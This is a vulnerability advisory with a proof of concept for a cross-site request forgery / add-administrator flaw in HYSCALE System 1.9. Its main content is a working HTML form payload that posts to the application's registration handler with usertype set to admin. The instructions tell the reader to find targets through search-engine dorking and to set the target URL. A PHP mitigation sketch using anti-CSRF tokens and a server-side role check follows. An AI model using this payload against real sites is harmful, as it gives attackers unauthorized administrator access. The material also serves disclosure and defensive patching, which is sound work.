HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery
HYSCALE System version 1.9 suffers from add-administrator and cross-site request forgery vulnerabilities.
=============================================================================================================================================
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip |
=============================================================================================================================================
poc :
[+] Dorking in Google or other search engine.
[+] This HTML page is designed to remotely add a new admin.
[+] Line 10 : Set your target URL
[+] Save payload as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
</head>
<body>
<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">
<label for="username">Username:</label>
<input type="text" name="username" id="username" required><br><br>
<label for="email">Email:</label>
<input type="email" name="email" id="email" required><br><br>
<label for="password">Password:</label>
<input type="password" name="password" id="password" required><br><br>
<label for="dob">Date of Birth:</label>
<input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>
<label>Gender:</label><br>
<input type="radio" name="gender" value="Male" id="male" required>
<label for="male">Male</label><br>
<input type="radio" name="gender" value="Female" id="female">
<label for="female">Female</label><br><br>
<label for="usertype">User Type:</label>
<select name="usertype" id="usertype" required>
<option value="admin">Admin</option>
<option value="user">User</option>
<option value="guest">Guest</option>
</select><br><br>
<label for="target_sales">Target Sales:</label>
<input type="text" name="target_sales" id="target_sales" required><br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
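Mitigation sketch, added here as an example and not taken from the HYSCALE source: a registration handler that rejects POSTs without a per-session anti-CSRF token and ignores a client-supplied usertype unless the session already belongs to an admin. The field names come from the form above; the csrf_token field, the session keys and the function names are assumptions.

```php
<?php
// Added example, not the vendor's code. Field names (password, usertype) come
// from the PoC form; csrf_token, the session keys and helpers are assumptions.
declare(strict_types=1);
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Call while rendering the form and embed the value in a hidden csrf_token input.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the posted token matches the one stored in this session.
function csrf_ok(array $post): bool
{
    $sent = $post['csrf_token'] ?? '';
    $want = $_SESSION['csrf_token'] ?? '';
    return is_string($sent) && is_string($want) && $want !== ''
        && hash_equals($want, $sent);
}

// Only a session already logged in as admin may pick a role; others get 'user'.
function resolve_usertype(array $post): string
{
    $allowed = ['admin', 'user', 'guest'];
    $asked   = $post['usertype'] ?? 'user';
    $isAdmin = ($_SESSION['usertype'] ?? '') === 'admin'; // assumed session key
    if ($isAdmin && is_string($asked) && in_array($asked, $allowed, true)) {
        return $asked;
    }
    return 'user';
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !csrf_ok($_POST)) {
    http_response_code(403);
    exit('Request rejected');
}

$usertype = resolve_usertype($_POST);
$hash     = password_hash((string)($_POST['password'] ?? ''), PASSWORD_DEFAULT);
// Store the username, email, $hash and $usertype with a prepared statement here.
```

With this in place, the cross-origin form above is answered with 403 because it carries no matching token, and an unauthenticated request that does carry one is stored with usertype "user" regardless of the posted value.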
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================